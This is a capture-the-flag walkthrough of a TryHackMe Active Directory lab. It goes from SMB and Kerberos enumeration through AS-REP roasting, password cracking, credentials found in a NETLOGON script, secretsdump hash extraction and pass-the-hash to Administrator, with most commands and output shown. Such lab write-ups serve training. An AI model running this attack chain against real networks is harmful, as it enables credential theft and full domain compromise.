TryHackMe >> VulnNet – Roasted

Table of Content

DESCRIPTION

VulnNet Entertainment just deployed a new instance on their network with the newly-hired system administrators. Being a security-aware company, they as always hired you to perform a penetration test, and see how system administrators are performing.

ENUM >> NMAP

# Nmap 7.92 scan initiated Sun Feb 13 12:01:45 2022 as: nmap -sS -A -p 53,88,135,139,389,445,464,593,636,3268,3269 -oN nmap_agressive 10.10.31.100
Nmap scan report for 10.10.31.100
Host is up (0.39s latency).

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-02-13 01:02:54Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: vulnnet-rst.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: vulnnet-rst.local0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: Host: WIN-2BO8M1OE1M1; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 59s
| smb2-time: 
|   date: 2022-02-13T01:03:28
|_  start_date: N/A
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required

TRACEROUTE (using port 135/tcp)
HOP RTT       ADDRESS
1   407.94 ms 10.9.0.1
2   408.00 ms 10.10.31.100

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Feb 13 12:03:16 2022 -- 1 IP address (1 host up) scanned in 91.77 seconds

No web server… just a plain server with default ports… SMB! 😉

ENUM >> SMB shares

  • First lets see what shares (if any) we can get to – I included a username but left the password blank as not supplying any username would cause a failure due to lack of access.
❯ smbmap -u stimpz -H 10.10.31.100
[+] Guest session       IP: 10.10.31.100:445    Name: vulnnet-rst.local0
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                NO ACCESS       Logon server share
        SYSVOL                                                  NO ACCESS       Logon server share
        VulnNet-Business-Anonymous                              READ ONLY       VulnNet Business Sharing
        VulnNet-Enterprise-Anonymous                            READ ONLY       VulnNet Enterprise Sharing
  • Looks like we have access to two non-default shares, VulnNet-Business-Anonymous and VulnNet-Enterprise-Anonymous. Both shares have 3 text files each:

  • VulnNet-Business-Anonymous:

❯ smbclient \\\\10.10.31.100\\VulnNet-Business-Anonymous
Enter WORKGROUP\stimpz's password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Mar 13 13:46:40 2021
  ..                                  D        0  Sat Mar 13 13:46:40 2021
  Business-Manager.txt                A      758  Fri Mar 12 12:24:34 2021
  Business-Sections.txt               A      654  Fri Mar 12 12:24:34 2021
  Business-Tracking.txt               A      471  Fri Mar 12 12:24:34 2021

                8771839 blocks of size 4096. 4526264 blocks available
  • VulnNet-Enterprise-Anonymous:
❯ smbclient \\\\10.10.31.100\\VulnNet-Enterprise-Anonymous
Enter WORKGROUP\stimpz's password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Mar 13 13:46:40 2021
  ..                                  D        0  Sat Mar 13 13:46:40 2021
  Enterprise-Operations.txt           A      467  Fri Mar 12 12:24:34 2021
  Enterprise-Safety.txt               A      503  Fri Mar 12 12:24:34 2021
  Enterprise-Sync.txt                 A      496  Fri Mar 12 12:24:34 2021

                8771839 blocks of size 4096. 4522008 blocks available
  • Out of the 6 text files, 4 of them had a unique full name mentioned. I ended up dumping their full names into a text file:
Alexa Whitehat
Jack Goldenhand
Tony Skid
Johnny Leet
  • Then, I ran a custom ruleset with John The Ripper that created a userlist from a list of full names, and I also added two known default account names, Administrator and krbtgt to the top of the file. I strongly suggest checking out Dzmitry Savitski’s blog post for details on how to set up his ruleset, it worked flawlessly and actually was one of the only few that generated the right pattern for this system’s naming convention.

  • Finally, I ran Kerbrute against the list and got the following response:

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 02/13/22 - Ronnie Flathers @ropnop

2022/02/13 13:51:29 >  Using KDC(s):
2022/02/13 13:51:29 >   vulnnet-rst.local:88

2022/02/13 13:51:29 >  [+] VALID USERNAME:       administrator@vulnnet-rst.local
2022/02/13 13:51:31 >  [+] VALID USERNAME:       j-goldenhand@vulnnet-rst.local
2022/02/13 13:51:31 >  [+] VALID USERNAME:       a-whitehat@vulnnet-rst.local
2022/02/13 13:51:31 >  [+] VALID USERNAME:       t-skid@vulnnet-rst.local
2022/02/13 13:51:31 >  [+] VALID USERNAME:       j-leet@vulnnet-rst.local
2022/02/13 13:51:33 >  Done! Tested 106 usernames (5 valid) in 4.483 seconds
  • However… as you will see below, there is a MUCH easier way than taking the whole route as far… which we will use below.

ENUM >> Users to scan against…

  • Impacket have a wonderful tool that can be used to rip users and groups named lookupsid.py – it rips the list directly via SID bruteforcing… ironically, I tried to do the same method via crackmapexecand even enum4linux but neither worked…:
❯ lookupsid.py anonymous@10.10.158.170 | tee vulnnet_users.txt
Password:
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Brute forcing SIDs at 10.10.158.170
[*] StringBinding ncacn_np:10.10.158.170[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-1589833671-435344116-4136949213
498: VULNNET-RST\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: VULNNET-RST\Administrator (SidTypeUser)
501: VULNNET-RST\Guest (SidTypeUser)
502: VULNNET-RST\krbtgt (SidTypeUser)
512: VULNNET-RST\Domain Admins (SidTypeGroup)
513: VULNNET-RST\Domain Users (SidTypeGroup)
514: VULNNET-RST\Domain Guests (SidTypeGroup)
515: VULNNET-RST\Domain Computers (SidTypeGroup)
516: VULNNET-RST\Domain Controllers (SidTypeGroup)
517: VULNNET-RST\Cert Publishers (SidTypeAlias)
518: VULNNET-RST\Schema Admins (SidTypeGroup)
519: VULNNET-RST\Enterprise Admins (SidTypeGroup)
520: VULNNET-RST\Group Policy Creator Owners (SidTypeGroup)
521: VULNNET-RST\Read-only Domain Controllers (SidTypeGroup)
522: VULNNET-RST\Cloneable Domain Controllers (SidTypeGroup)
525: VULNNET-RST\Protected Users (SidTypeGroup)
526: VULNNET-RST\Key Admins (SidTypeGroup)
527: VULNNET-RST\Enterprise Key Admins (SidTypeGroup)
553: VULNNET-RST\RAS and IAS Servers (SidTypeAlias)
571: VULNNET-RST\Allowed RODC Password Replication Group (SidTypeAlias)
572: VULNNET-RST\Denied RODC Password Replication Group (SidTypeAlias)
1000: VULNNET-RST\WIN-2BO8M1OE1M1$ (SidTypeUser)
1101: VULNNET-RST\DnsAdmins (SidTypeAlias)
1102: VULNNET-RST\DnsUpdateProxy (SidTypeGroup)
1104: VULNNET-RST\enterprise-core-vn (SidTypeUser)
1105: VULNNET-RST\a-whitehat (SidTypeUser)
1109: VULNNET-RST\t-skid (SidTypeUser)
1110: VULNNET-RST\j-goldenhand (SidTypeUser)
1111: VULNNET-RST\j-leet (SidTypeUser)
  • Then to grab only the users and drop them in a list, we can use the following command:
❯ grep SidTypeUser vulnnet_users.txt | awk '{print $2}' | cut -d "\\" -f2 > users.txt
  • This leaves us with the following userlist:
Administrator
Guest
krbtgt
WIN-2BO8M1OE1M1$
enterprise-core-vn
a-whitehat
t-skid
j-goldenhand
j-leet

ENUM >> Impacket’s GetNPUsers.py

  • Let’s throw our newly generated userlist at GetNPUsers.py and see what we get:
❯ GetNPUsers.py vulnnet-rst.local/ -dc-ip 10.10.158.170 -no-pass -usersfile users.txt
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Guest doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User WIN-2BO8M1OE1M1$ doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User enterprise-core-vn doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User a-whitehat doesn't have UF_DONT_REQUIRE_PREAUTH set

<REDACTED>

[-] User j-goldenhand doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User j-leet doesn't have UF_DONT_REQUIRE_PREAUTH set
LOOT >> Cracking t-skid‘s AS-REP hash
❯ john --wordlist=/usr/share/wordlists/rockyou.txt t-skid_as-rep.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
<REDACTED>        ($krb5asrep$23$t-skid@VULNNET-RST.LOCAL)
1g 0:00:00:04 DONE (2022-02-13 14:56) 0.2358g/s 749645p/s 749645c/s 749645C/s tjalling..tj0216044
Use the "--show" option to display all of the cracked passwords reliably
Session completed

ENUM >> More SMB… with a user this time!

  • Using t-skids credentials we get a few more open shares… NETLOGON and SYSVOL:
✖ smbmap -u t-skid -p <REDACTED> -H 10.10.158.170
[+] IP: 10.10.158.170:445       Name: vulnnet-rst.local
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share
        SYSVOL                                                  READ ONLY       Logon server share
        VulnNet-Business-Anonymous                              READ ONLY       VulnNet Business Sharing
        VulnNet-Enterprise-Anonymous                            READ ONLY       VulnNet Enterprise Sharing
  • If we do a recursive scan on the NETLOGON share we see a file titled ResetPassword.vbs
❯ smbmap -u t-skid -p <REDACTED> -H 10.10.158.170 -R 'NETLOGON'
[+] IP: 10.10.158.170:445       Name: vulnnet-rst.local
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        NETLOGON                                                READ ONLY
        .\NETLOGON\*
        dr--r--r--                0 Wed Mar 17 10:15:49 2021    .
        dr--r--r--                0 Wed Mar 17 10:15:49 2021    ..
        fr--r--r--             2821 Wed Mar 17 10:18:14 2021    ResetPassword.vbs
LOOT >> More creds from ResetPassword.vbs
  • Inside ResetPassword.vbs we have 2 very interesting lines:
strUserNTName = "<REDACTED>"
strPassword = "<REDACTED>"
  • Let’s see what smbmap comes back with when we try them:
❯ smbmap -u a-whitehat -p <REDACTED> -H 10.10.158.170
[+] IP: 10.10.158.170:445       Name: vulnnet-rst.local
[-] Work[!] Unable to remove test directory at \\10.10.158.170\SYSVOL\CSTFIGYZGM, please remove manually
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  READ, WRITE     Remote Admin
        C$                                                      READ, WRITE     Default share
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                READ, WRITE     Logon server share
        SYSVOL                                                  READ, WRITE     Logon server share
        VulnNet-Business-Anonymous                              READ ONLY       VulnNet Business Sharing
        VulnNet-Enterprise-Anonymous                            READ ONLY       VulnNet Enterprise Sharing
  • Now we are definitely getting somewhere… R/W access on ADMIN$ means we have some serious privs now! 😉

PRIVESC >> a-whitehat has WinRM access!

❯ evil-winrm -i vulnnet-rst.local -u a-whitehat -p <REDACTED>

Evil-WinRM shell v3.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\a-whitehat\Documents>
  • Hooray! Shell access to a user that has elevated privileges! We can hopefully do a secretsdump on the DC at this height. First thing’s first though…
LOOT >> user.txt
*Evil-WinRM* PS C:\Users\a-whitehat\Desktop> ls
*Evil-WinRM* PS C:\Users\a-whitehat\Desktop> Get-ChildItem -Path C:\Users\ -Recurse -Include user.txt

    Directory: C:\Users\enterprise-core-vn\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        3/13/2021   3:43 PM             39 user.txt

*Evil-WinRM* PS C:\Users\a-whitehat\Desktop> cat C:\Users\enterprise-core-vn\Desktop\user.txt
<REDACTED>

ENUM >> secretsdump using a-whitehat’s credentials

  • a-whitehat brings the goods! 😉
❯ secretsdump.py 'vulnnet-rst.local/a-whitehat:<REDACTED>@10.10.219.71'
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Target system bootKey: 0xf10a2788aef5f622149a41b2c745f49a
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets

<REDACTED>

[*] Cleaning up...
  • Awesome! Now that we have the Administrator NTLM hash… can we use it to login via WinRM?
❯ evil-winrm -i vulnnet-rst.local -u Administrator -H <REDACTED>

Evil-WinRM shell v3.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
vulnnet-rst\administrator
LOOT >> system.txt
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat system.txt
<REDACTED>


Leave a Reply

Your email address will not be published.